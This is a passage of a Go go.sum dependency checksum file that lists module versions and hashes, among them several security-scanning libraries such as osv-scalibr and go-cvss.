h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8= github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA= github.com/golang/protobuf v1.4.0-rc.2/go.mod h1:LlEzMj4AhA7rCAGe4KMBDvJI+AwstrUpVNzEA03Pprs= github.com/golang/protobuf v1.4.0-rc.4.0.20200313231945-b860323f09d0/go.mod h1:WU3c8KckQ9AFe+yFwt9sWVRKCVIyN9cPHBJSNnbL67w= github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvqG2KuDX0= github.com/golang/protobuf v1.4.1/go.mod h1:U8fpvMrcmy5pZrNK1lt4xCsGvpyWQ/VVv6QDs8UjoX8= github.com/golang/protobuf v1.4.3/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= github.com/golang/protobuf v1.5.4 h1:i7eJL8qZTpSEXOPTxNKhASYpMn+8e5Q6AdndVa1dWek= github.com/golang/protobuf v1.5.4/go.mod h1:lnTiLA8Wa4RWRcIUkrtSVa5nRhsEGBg48fD6rSs7xps= github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M= github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.5.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.5.3/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.5.9/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY= github.com/google/go-cmp v0.6.0/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY= github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8= github.com/google/go-cmp v0.7.0/go.mod h1:pXiqmnSA92OHEEa9HXL2W4E7lf9JzCmGVUdgjX3N/iU= github.com/google/go-containerregistry v0.20.6 h1:cvWX87UxxLgaH76b4hIvya6Dzz9qHB31qAwjAohdSTU= github.com/google/go-containerregistry v0.20.6/go.mod h1:T0x8MuoAoKX/873bkeSfLD2FAkwCDf9/HZgsFJ02E2Y= github.com/google/go-cpy v0.0.0-20211218193943-a9c933c06932 h1:5/4TSDzpDnHQ8rKEEQBjRlYx77mHOvXu08oGchxej7o= github.com/google/go-cpy v0.0.0-20211218193943-a9c933c06932/go.mod h1:cC6EdPbj/17GFCPDK39NRarlMI+kt+O60S12cNB5J9Y= github.com/google/jsonschema-go v0.4.2 h1:tmrUohrwoLZZS/P3x7ex0WAVknEkBZM46iALbcqoRA8= github.com/google/jsonschema-go v0.4.2/go.mod h1:r5quNTdLOYEz95Ru18zA0ydNbBuYoo9tgaYcxEYhJVE= github.com/google/osv-scalibr v0.4.6-0.20260318175007-ec4239d68fb9 h1:bOqoTMcFFJf0yuXgH+EdPWzcgIIUzyCWxT/agq2u4lw= github.com/google/osv-scalibr v0.4.6-0.20260318175007-ec4239d68fb9/go.mod h1:0yLzHje112PqLC/q9GKwcmaKrKWotOvc49xc+SegKV0= github.com/google/pprof v0.0.0-20250403155104-27863c87afa6 h1:BHT72Gu3keYf3ZEu2J0b1vyeLSOYI8bm5wbJM/8yDe8= github.com/google/pprof v0.0.0-20250403155104-27863c87afa6/go.mod h1:boTsfXsheKC2y+lKOCMpSfarhxDeIzfZG1jqGcPl3cA= github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0= github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/gorilla/css v1.0.1 h1:ntNaBIghp6JmvWnxbZKANoLyuXTPZ4cAMlo6RyhlbO8= github.com/gorilla/css v1.0.1/go.mod h1:BvnYkspnSzMmwRK+b8/xgNPLiIuNZr6vbZBTPQ2A3b0= github.com/grpc-ecosystem/grpc-gateway/v2 v2.26.1 h1:e9Rjr40Z98/clHv5Yg79Is0NtosR5LXRvdr7o/6NwbA= github.com/grpc-ecosystem/grpc-gateway/v2 v2.26.1/go.mod h1:tIxuGz/9mpox++sgp9fJjHO0+q1X9/UOWd798aAm22M= github.com/hexops/gotextdiff v1.0.3 h1:gitA9+qJrrTCsiCl7+kh75nPqQt1cx4ZkudSTLoUqJM= github.com/hexops/gotextdiff v1.0.3/go.mod h1:pSWU5MAI3yDq+fZBTazCSJysOMbxWL1BSow5/V2vxeg= github.com/ianlancetaylor/demangle v0.0.0-20251118225945-96ee0021ea0f h1:Fnl4pzx8SR7k7JuzyW8lEtSFH6EQ8xgcypgIn8pcGIE= github.com/ianlancetaylor/demangle v0.0.0-20251118225945-96ee0021ea0f/go.mod h1:gx7rwoVhcfuVKG5uya9Hs3Sxj7EIvldVofAWIUtGouw= github.com/icholy/digest v1.1.0 h1:HfGg9Irj7i+IX1o1QAmPfIBNu/Q5A5Tu3n/MED9k9H4= github.com/icholy/digest v1.1.0/go.mod h1:QNrsSGQ5v7v9cReDI0+eyjsXGUoRSUZQHeQ5C4XLa0Y= github.com/jbenet/go-context v0.0.0-20150711004518-d14ea06fba99 h1:BQSFePA1RWJOlocH6Fxy8MmwDt+yVQYULKfN0RoTN8A= github.com/jbenet/go-context v0.0.0-20150711004518-d14ea06fba99/go.mod h1:1lJo3i6rXxKeerYnT8Nvf0QmHCRC1n8sfWVwXF2Frvo= github.com/jedib0t/go-pretty/v6 v6.7.8 h1:BVYrDy5DPBA3Qn9ICT+PokP9cvCv1KaHv2i+Hc8sr5o= github.com/jedib0t/go-pretty/v6 v6.7.8/go.mod h1:YwC5CE4fJ1HFUDeivSV1r//AmANFHyqczZk+U6BDALU= github.com/jessevdk/go-flags v1.4.0/go.mod h1:4FA24M0QyGHXBuZZK/XkWh8h0e1EYbRYJSGM75WSRxI= github.com/kevinburke/ssh_config v1.2.0 h1:x584FjTGwHzMwvHx18PXxbBVzfnxogHaAReU4gf13a4= github.com/kevinburke/ssh_config v1.2.0/go.mod h1:CT57kijsi8u/K/BOFA39wgDQJ9CxiF4nAY/ojJ6r6mM= github.com/kisielk/errcheck v1.5.0/go.mod h1:pFxgyoBC7bSaBwPgfKdkLd5X25qrDl4LWUI2bnpBCr8= github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck= github.com/klauspost/compress v1.18.0 h1:c/Cqfb0r+Yi+JtIEq73FWXVkRonBlf0CRNYc8Zttxdo= github.com/klauspost/compress v1.18.0/go.mod h1:2Pp+KzxcywXVXMr50+X0Q/Lsb43OQHYWRCY2AiWywWQ= github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo= github.com/kr/pretty v0.3.1 h1:flRD4NNwYAUpkphVc1HcthR4KEIFJ65n8Mw5qdRn3LE= github.com/kr/pretty v0.3.1/go.mod h1:hoEshYVHaxMs3cyo3Yncou5ZscifuDolrwPKZanG3xk= github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ= github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI= github.com/kr/text v0.2.0 h1:5Nx0Ya0ZqY2ygV366QzturHI13Jq95ApcVaJBhpS+AY= github.com/kr/text v0.2.0/go.mod h1:eLer722TekiGuMkidMxC/pM04lWEeraHUUmBw8l2grE= github.com/kylelemons/godebug v1.1.0 h1:RPNrshWIDI6G2gRW9EHilWtl7Z6Sb1BR0xunSBf0SNc= github.com/kylelemons/godebug v1.1.0/go.mod h1:9/0rRGxNHcop5bhtWyNeEfOS8JIWk580+fNqagV/RAw= github.com/lucasb-eyer/go-colorful v1.3.0 h1:2/yBRLdWBZKrf7gB40FoiKfAWYQ0lqNcbuQwVHXptag= github.com/lucasb-eyer/go-colorful v1.3.0/go.mod h1:R4dSotOR9KMtayYi1e77YzuveK+i7ruzyGqttikkLy0= github.com/lunixbochs/struc v0.0.0-20200707160740-784aaebc1d40 h1:EnfXoSqDfSNJv0VBNqY/88RNnhSGYkrHaO0mmFGbVsc= github.com/lunixbochs/struc v0.0.0-20200707160740-784aaebc1d40/go.mod h1:vy1vK6wD6j7xX6O6hXe621WabdtNkou2h7uRtTfRMyg= github.com/maruel/natural v1.1.1 h1:Hja7XhhmvEFhcByqDoHz9QZbkWey+COd9xWfCfn1ioo= github.com/maruel/natural v1.1.1/go.mod h1:v+Rfd79xlw1AgVBjbO0BEQmptqb5HvL/k9GRHB7ZKEg= github.com/masahiro331/go-ext4-filesystem v0.0.0-20240620024024-ca14e6327bbd h1:JEIW94K3spsvBI5Xb9PGhKSIza9/jxO1lF30tPCAJlA= github.com/masahiro331/go-ext4-filesystem v0.0.0-20240620024024-ca14e6327bbd/go.mod h1:3XMMY1M486mWGTD13WPItg6FsgflQR72ZMAkd+gsyoQ= github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY= github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y= github.com/mattn/go-runewidth v0.0.12/go.mod h1:RAqKPSqVFrSLVXbA8x7dzmKdmGzieGRCM46jaSJTDAk= github.com/mattn/go-runewidth v0.0.20 h1:WcT52H91ZUAwy8+HUkdM3THM6gXqXuLJi9O3rjcQQaQ= github.com/mattn/go-runewidth v0.0.20/go.mod h1:XBkDxAl56ILZc9knddidhrOlY5R/pDhgLpndooCuJAs= github.com/mattn/go-shellwords v1.0.12 h1:M2zGm7EW6UQJvDeQxo4T51eKPurbeFbe8WtebGE2xrk= github.com/mattn/go-shellwords v1.0.12/go.mod h1:EZzvwXDESEeg03EKmM+RmDnNOPKG4lLtQsUlTZDWQ8Y= github.com/microcosm-cc/bluemonday v1.0.27 h1:MpEUotklkwCSLeH+Qdx1VJgNqLlpY2KXwXFM08ygZfk= github.com/microcosm-cc/bluemonday v1.0.27/go.mod h1:jFi9vgW+H7c3V0lb6nR74Ib/DIB5OBs92Dimizgw2cA= github.com/micromdm/plist v0.2.1 h1:4SoSMOVAyzv1ThT8IKLgXLJEKezLkcVDN6wivqTTFdo= github.com/micromdm/plist v0.2.1/go.mod h1:flkfm0od6GzyXBqI28h5sgEyi3iPO28W2t1Zm9LpwWs= github.com/mitchellh/go-homedir v1.1.0 h1:lukF9ziXFxDFPkA1vsr5zpc1XuPDn/wFntq5mG+4E0Y= github.com/mitchellh/go-homedir v1.1.0/go.mod h1:SfyaCUpYCn1Vlf4IUYiD9fPX4A5wJrkLzIz1N1q0pr0= github.com/moby/buildkit v0.23.2 h1:gt/dkfcpgTXKx+B9I310kV767hhVqTvEyxGgI3mqsGQ= github.com/moby/buildkit v0.23.2/go.mod h1:iEjAfPQKIuO+8y6OcInInvzqTMiKMbb2RdJz1K/95a0= github.com/moby/docker-image-spec v1.3.1 h1:jMKff3w6PgbfSa69GfNg+zN/XLhfXJGnEx3Nl2EsFP0= github.com/moby/docker-image-spec v1.3.1/go.mod h1:eKmb5VW8vQEh/BAr2yvVNvuiJuY6UIocYsFu/DxxRpo= github.com/moby/locker v1.0.1 h1:fOXqR41zeveg4fFODix+1Ch4mj/gT0NE1XJbp/epuBg= github.com/moby/locker v1.0.1/go.mod h1:S7SDdo5zpBK84bzzVlKr2V0hz+7x9hWbYC/kq7oQppc= github.com/moby/sys/atomicwriter v0.1.0 h1:kw5D/EqkBwsBFi0ss9v1VG3wIkVhzGvLklJ+w3A14Sw= github.com/moby/sys/atomicwriter v0.1.0/go.mod h1:Ul8oqv2ZMNHOceF643P6FKPXeCmYtlQMvpizfsSoaWs= github.com/moby/sys/mountinfo v0.7.2 h1:1shs6aH5s4o5H2zQLn796ADW1wMrIwHsyJ2v9KouLrg= github.com/moby/sys/mountinfo v0.7.2/go.mod h1:1YOa8w8Ih7uW0wALDUgT1dTTSBrZ+HiBLGws92L2RU4= github.com/moby/sys/sequential v0.6.0 h1:qrx7XFUd/5DxtqcoH1h438hF5TmOvzC/lspjy7zgvCU= github.com/moby/sys/sequential v0.6.0/go.mod h1:uyv8EUTrca5PnDsdMGXhZe6CCe8U/UiTWd+lL+7b/Ko= github.com/moby/sys/signal v0.7.1 h1:PrQxdvxcGijdo6UXXo/lU/TvHUWyPhj7UOpSo8tuvk0= github.com/moby/sys/signal v0.7.1/go.mod h1:Se1VGehYokAkrSQwL4tDzHvETwUZlnY7S5XtQ50mQp8= github.com/moby/sys/user v0.4.0 h1:jhcMKit7SA80hivmFJcbB1vqmw//wU61Zdui2eQXuMs= github.com/moby/sys/user v0.4.0/go.mod h1:bG+tYYYJgaMtRKgEmuueC0hJEAZWwtIbZTB+85uoHjs= github.com/moby/sys/userns v0.1.0 h1:tVLXkFOxVu9A64/yh59slHVv9ahO9UIev4JZusOLG/g= github.com/moby/sys/userns v0.1.0/go.mod h1:IHUYgu/kao6N8YZlp9Cf444ySSvCmDlmzUcYfDHOl28= github.com/moby/term v0.0.0-20221205130635-1aeaba878587 h1:HfkjXDfhgVaN5rmueG8cL8KKeFNecRCXFhaJ2qZ5SKA= github.com/moby/term v0.0.0-20221205130635-1aeaba878587/go.mod h1:8FzsFHVUBGZdbDsJw/ot+X+d5HLUbvklYLJ9uGfcI3Y= github.com/modelcontextprotocol/go-sdk v1.4.1 h1:M4x9GyIPj+HoIlHNGpK2hq5o3BFhC+78PkEaldQRphc= github.com/modelcontextprotocol/go-sdk v1.4.1/go.mod h1:Bo/mS87hPQqHSRkMv4dQq1XCu6zv4INdXnFZabkNU6s= github.com/mohae/deepcopy v0.0.0-20170929034955-c48cc78d4826 h1:RWengNIwukTxcDr9M+97sNutRR1RKhG96O6jWumTTnw= github.com/mohae/deepcopy v0.0.0-20170929034955-c48cc78d4826/go.mod h1:TaXosZuwdSHYgviHp1DAtfrULt5eUgsSMsZf+YrPgl8= github.com/morikuni/aec v1.0.0 h1:nP9CBfwrvYnBRgY6qfDQkygYDmYwOilePFkwzv4dU8A= github.com/morikuni/aec v1.0.0/go.mod h1:BbKIizmSmc5MMPqRYbxO4ZU0S0+P200+tUnFx7PXmsc= github.com/muesli/cancelreader v0.2.2 h1:3I4Kt4BQjOR54NavqnDogx/MIoWBFa0StPA8ELUXHmA= github.com/muesli/cancelreader v0.2.2/go.mod h1:3XuTXfFS2VjM+HTLZY9Ak0l6eUKfijIfMUZ4EgX0QYo= github.com/muesli/reflow v0.3.0 h1:IFsN6K9NfGtjeggFP+68I4chLZV2yIKsXJFNZ+eWh6s= github.com/muesli/reflow v0.3.0/go.mod h1:pbwTDkVPibjO2kyvBQRBxTWEEGDGq0FlB1BIKtnHY/8= github.com/ncruces/go-strftime v0.1.9 h1:bY0MQC28UADQmHmaF5dgpLmImcShSi2kHU9XLdhx/f4= github.com/ncruces/go-strftime v0.1.9/go.mod h1:Fwc5htZGVVkseilnfgOVb9mKy6w1naJmn9CehxcKcls= github.com/onsi/gomega v1.34.1 h1:EUMJIKUjM8sKjYbtxQI9A4z2o+rruxnzNvpknOXie6k= github.com/onsi/gomega v1.34.1/go.mod h1:kU1QgUvBDLXBJq618Xvm2LUX6rSAfRaFRTcdOeDLwwY= github.com/opencontainers/go-digest v1.0.0 h1:apOUWs51W5PlhuyGyz9FCeeBIOUDA/6nW8Oi/yOhh5U= github.com/opencontainers/go-digest v1.0.0/go.mod h1:0JzlMkj0TRzQZfJkVvzbP0HBR3IKzErnv2BNG4W4MAM= github.com/opencontainers/image-spec v1.1.1 h1:y0fUlFfIZhPF1W537XOLg0/fcx6zcHCJwooC2xJA040= github.com/opencontainers/image-spec v1.1.1/go.mod h1:qpqAh3Dmcf36wStyyWU+kCeDgrGnAve2nCC8+7h8Q0M= github.com/opencontainers/runtime-spec v1.2.1 h1:S4k4ryNgEpxW1dzyqffOmhI1BHYcjzU8lpJfSlR0xww= github.com/opencontainers/runtime-spec v1.2.1/go.mod h1:jwyrGlmzljRJv/Fgzds9SsS/C5hL+LL3ko9hs6T5lQ0= github.com/opencontainers/selinux v1.13.0 h1:Zza88GWezyT7RLql12URvoxsbLfjFx988+LGaWfbL84= github.com/opencontainers/selinux v1.13.0/go.mod h1:XxWTed+A/s5NNq4GmYScVy+9jzXhGBVEOAyucdRUY8s= github.com/ossf/osv-schema/bindings/go v0.0.0-20260304051245-ec3272c283e4 h1:4zC49SlXs2waAuZJFEP1lAGf9Bgjg8SQww6y8C9znJ0= github.com/ossf/osv-schema/bindings/go v0.0.0-20260304051245-ec3272c283e4/go.mod h1:NJzqZPEfOy3B1dWe9pKRtmxJ/UF1++6apnQLjz3du8E= github.com/owenrumney/go-sarif/v3 v3.3.0 h1:p5oSxEV0uPWBRpAspTmwWr4t1YZyKUpdoFzSB7WE90A= github.com/owenrumney/go-sarif/v3 v3.3.0/go.mod h1:72MaugkExDexbSauRuPq6BvUAAqAX0TwoNYMIQyZCMw= github.com/package-url/packageurl-go v0.1.5 h1:O4efRXja2XQ5CtiiYiCZ22k/m7i5ugLiAghgcC+eDgk= github.com/package-url/packageurl-go v0.1.5/go.mod h1:nKAWB8E6uk1MHqiS/lQb9pYBGH2+mdJ2PJc2s50dQY0= github.com/pandatix/go-cvss v0.6.2 h1:TFiHlzUkT67s6UkelHmK6s1INKVUG7nlKYiWWDTITGI= github.com/pandatix/go-cvss v0.6.2/go.mod h1:jDXYlQBZrc8nvrMUVVvTG8PhmuShOnKrxP53nOFkt8Q= github.com/pierrec/lz4/v4 v4.1.17 h1:kV4Ip+/hUBC+8T6+2EgburRtkE9ef4nbY3f4dFhGjMc= github.com/pierrec/lz4/v4 v4.1.17/go.mod h1:gZWDp/Ze/IJXGXf23ltt2EXimqmTUXEy0GFuRQyBid4= github.com/pjbgf/sha1cd v0.4.0 h1:NXzbL1RvjTUi6kgYZCX3fPwwl27Q1LJndxtUDVfJGRY= github.com/pjbgf/sha1cd v0.4.0/go.mod h1:zQWigSxVmsHEZow5qaLtPYxpcKMMQpa09ixqBxuCS6A= github.com/pkg/diff v0.0.0-20210226163009-20ebb0f2a09e/go.mod h1:pJLUxLENpZxwdsKMEsNbx1VGcRFpLqf3715MtcvvzbA= github.com/pkg/errors v0.8.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= github.com/pkg/errors v0.9.1 h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4= github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= github.com/pkg/xattr v0.4.9 h1:5883YPCtkSd8LFbs13nXplj9g9tlrwoJRjgpgMu1/fE= github.com/pkg/xattr v0.4.9/go.mod h1:di8WF84zAKk8jzR1UBTEWh9AUlIZZ7M/JNt8e9B6ktU= github.com/planetscale/vtprotobuf v0.6.1-0.20240319094008-0393e58bdf10 h1:GFCKgmp0tecUJ0sJuv4pzYCqS9+RGSn52M3FUwPs+uo= github.com/planetscale/vtprotobuf v0.6.1-0.20240319094008-0393e58bdf10/go.mod h1:t/avpk3KcrXxUnYOhZhMXJlSEyie6gQbtLq5NM3loB8= github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2 h1:Jamvg5psRIccs7FGNTlIRMkT8wgtp5eCXdBlqhYGL6U= github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= github.com/prometheus/procfs v0.15.1 h1:YagwOFzUgYfKKHX6Dr+sHT7km/hxC76UB0learggepc= github.com/prometheus/procfs v0.15.1/go.mod h1:fB45yRUv8NstnjriLhBQLuOUt+WW4BsoGhij/e3PBqk= github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec h1:W09IVJc94icq4NjY3clb7Lk8O1qJ8BdBEF8z0ibU0rE= github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec/go.mod h1:qqbHyh8v60DhA7CoWK5oRCqLrMHRGoxYCSS9EjAz6Eo= github.com/rivo/uniseg v0.1.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc= github.com/rivo/uniseg v0.2.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc= github.com/rivo/uniseg v0.4.7 h1:WUdvkW8uEhrYfLC4ZzdpI2ztxP1I582+49Oc5Mq64VQ= github.com/rivo/uniseg v0.4.7/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88= github.com/rogpeppe/go-internal v1.9.0/go.mod h1:WtVeX8xhTBvf0smdhujwtBcq4Qrzq/fJaraNFVN+nFs= github.com/rogpeppe/go-internal v1.14.1 h1:UQB4HGPB6osV0SQTLymcB4TgvyWu6ZyliaW0tI/otEQ= github.com/rogpeppe/go-internal v1.14.1/go.mod h1:MaRKkUm5W0goXpeCfT7UZI6fk/L7L7so1lCWt35ZSgc= github.com/rust-secure-code/go-rustaudit v0.0.0-20250226111315-e20ec32e963c h1:8gOLsYwaY2JwlTMT4brS5/9XJdrdIbmk2obvQ748CC0= github.com/rust-secure-code/go-rustaudit v0.0.0-20250226111315-e20ec32e963c/go.mod h1:kwM/7r/rVluTE8qJbHAffduuqmSv4knVQT2IajGvSiA= github.com/saferwall/pe v1.5.7 h1:fxlRLvhyr+3cIs1yturWhWmgACIu147o+xSEYFlUAyA= github.com/saferwall/pe v1.5.7/go.mod h1:mJx+PuptmNpoPFBNhWs/uDMFL/kTHVZIkg0d4OUJFbQ= github.com/sahilm/fuzzy v0.1.1 h1:ceu5RHF8DGgoi+/dR5PsECjCDH1BE3Fnmpo7aVXOdRA= github.com/sahilm/fuzzy v0.1.1/go.mod h1:VFvziUEIMCrT6A6tw2RFIXPXXmzXbOsSHF0DOI8ZK9Y= github.com/santhosh-tekuri/jsonschema/v6 v6.0.1 h1:PKK9DyHxif4LZo+uQSgXNqs0jj5+xZwwfKHgph2lxBw= github.com/santhosh-tekuri/jsonschema/v6 v6.0.1/go.mod h1:JXeL+ps8p7/KNMjDQk3TCwPpBy0wYklyWTfbkIzdIFU= github.com/sebdah/goldie v1.0.0 h1:9GNhIat69MSlz/ndaBg48vl9dF5fI+NBB6kfOxgfkMc= github.com/sebdah/goldie v1.0.0/go.mod h1:jXP4hmWywNEwZzhMuv2ccnqTSFpuq8iyQhtQdkkZBH4= github.com/secDre4mer/pkcs7 v0.0.0-20240322103146-665324a4461d h1:RQqyEogx5J6wPdoxqL132b100j8KjcVHO1c0KLRoIhc= github.com/secDre4mer/pkcs7 v0.0.0-20240322103146-665324a4461d/go.mod h1:PegD7EVqlN88z7TpCqH92hHP+GBpfomGCCnw1PFtNOA= github.com/segmentio/asm v1.1.3 h1:WM03sfUOENvvKexOLp+pCqgb/WDjsi7EK8gIsICtzhc= github.com/segmentio/asm v1.1.3/go.mod h1:Ld3L4ZXGNcSLRg4JBsZ3//1+f/TjYl0Mzen/DQy1EJg= github.com/segmentio/encoding v0.5.4 h1:OW1VRern8Nw6ITAtwSZ7Idrl3MXCFwXHPgqESYfvNt0= github.com/segmentio/encoding v0.5.4/go.mod h1:HS1ZKa3kSN32ZHVZ7ZLPLXWvOVIiZtyJnO1gPH1sKt0= github.com/sergi/go-diff v1.4.0 h1:n/SP9D5ad1fORl+llWyN+D6qoUETXNZARKjyY2/KVCw= github.com/sergi/go-diff v1.4.0/go.mod h1:A0bzQcvG0E7Rwjx0REVgAGH58e96+X0MeOfepqsbeW4= github.com/shirou/gopsutil v3.21.11+incompatible h1:+1+c1VGhc88SSonWP6foOcLhvnKlUeu/erjjvaPEYiI= github.com/shirou/gopsutil v3.21.11+incompatible/go.mod h1:5b4v6he4MtMOwMlS0TUMTu2PcXUg8+E1lC7eC3UO/RA= github.com/sirupsen/logrus v1.7.0/go.mod h1:yWOB1SBYBC5VeMP7gHvWumXLIWorT60ONWic61uBYv0= github.com/sirupsen/logrus v1.9.4-0.20230606125235-dd1b4c2e81af h1:Sp5TG9f7K39yfB+If0vjp97vuT74F72r8hfRpP8jLU0= github.com/sirupsen/logrus v1.9.4-0.20230606125235-dd1b4c2e81af/go.mod h1:naHLuLoDiP4jHNo9R0sCBMtWGeIprob74mVsIT4qYEQ= github.com/skeema/knownhosts v1.3.1 h1:X2osQ+RAjK76shCbvhHHHVl3ZlgDm8apHEHFqRjnBY8= github.com/skeema/knownhosts v1.3.1/go.mod h1:r7KTdC8l4uxWRyK2TpQZ/1o5HaSzh06ePQNxPwTcfiY= github.com/spdx/gordf v0.0.0-20201111095634-7098f93598fb/go.mod h1:uKWaldnbMnjsSAXRurWqqrdyZen1R7kxl8TkmWk2OyM= github.com/spdx/gordf v0.0.0-20250128162952-000978ccd6fb h1:7G2Czq97VORM5xNRrD8tSQdhoXPRs8s+Otlc7st9TS0= github.com/spdx/gordf v0.0.0-20250128162952-000978ccd6fb/go.mod h1:uKWaldnbMnjsSAXRurWqqrdyZen1R7kxl8TkmWk2OyM= github.com/spdx/tools-golang v0.5.5 h1:61c0KLfAcNqAjlg6UNMdkwpMernhw3zVRwDZ2x9XOmk= github.com/spdx/tools-golang v0.5.5/go.mod h1:MVIsXx8ZZzaRWNQpUDhC4Dud34edUYJYecciXgrw5vE= github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= github.com/stretchr/objx v0.4.0/go.mod h1:YvHI0jy2hoMjB+UWwv71VJQ9isScKT/TqJzVSSt89Yw= github.com/stretchr/objx v0.5.0/go.mod h1:Yh+to48EsGEfYuaHDzXPcE3xhTkx73EhmCGUpEOglKo= github.com/stretchr/objx v0.5.2/go.mod h1:FRsXN1f5AsAjCGJKqEizvkpNtU+EGNCLh3NxZ/8L+MA= github.com/stretchr/testify v1.2.2/go.mod h1:a8OnRcib4nhh0OaRAV+Yts87kKdq0PP7pXfy6kDkUVs= github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI= github.com/stretchr/testify v1.4.0/go.mod h1:j7eGeouHqKxXV5pUuKE4zz7dFj8WfuZ+81PSLYec5m4= github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU= github.com/stretchr/testify v1.8.1/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= github.com/stretchr/testify v1.8.4/go.mod h1:sz/lmYIOXD/1dqDmKjjqLyZ2RngseejIcXlSw2iwfAo= github.com/stretchr/testify v1.9.0/go.mod h1:r2ic/lqez/lEtzL7wO/rwa5dbSLXVDPFyf8C91i36aY= github.com/stretchr/testify v1.11.1 h1:7s2iGBzp5EwR7/aIZr8ao5+dra3wiQyKjjFuvgVKu7U= github.com/stretchr/testify v1.11.1/go.mod h1:wZwfW3scLgRK+23gO65QZefKpKQRnfz6sD981Nm4B6U= github.com/terminalstatic/go-xsd-validate v0.1.6 h1:TenYeQ3eY631qNi1/cTmLH/s2slHPRKTTHT+XSHkepo= github.com/terminalstatic/go-xsd-validate v0.1.6/go.mod h1:18lsvYFofBflqCrvo1umpABZ99+GneNTw2kEEc8UPJw= github.com/thoas/go-funk v0.9.3 h1:7+nAEx3kn5ZJcnDm2Bh23N2yOtweO14bi//dvRtgLpw= github.com/thoas/go-funk v0.9.3/go.mod h1:+IWnUfUmFO1+WVYQWQtIJHeRRdaIyyYglZN7xzUPe4Q= github.com/tidwall/gjson v1.14.2/go.mod h1:/wbyibRr2FHMks5tjHJ5F8dMZh3AcwJEMf5vlfC0lxk= github.com/tidwall/gjson v1.18.0 h1:FIDeeyB800efLX89e5a8Y0BNH+LOngJyGrIWxG2FKQY= github.com/tidwall/gjson v1.18.0/go.mod h1:/wbyibRr2FHMks5tjHJ5F8dMZh3AcwJEMf5vlfC0lxk= github.com/tidwall/jsonc v0.3.2 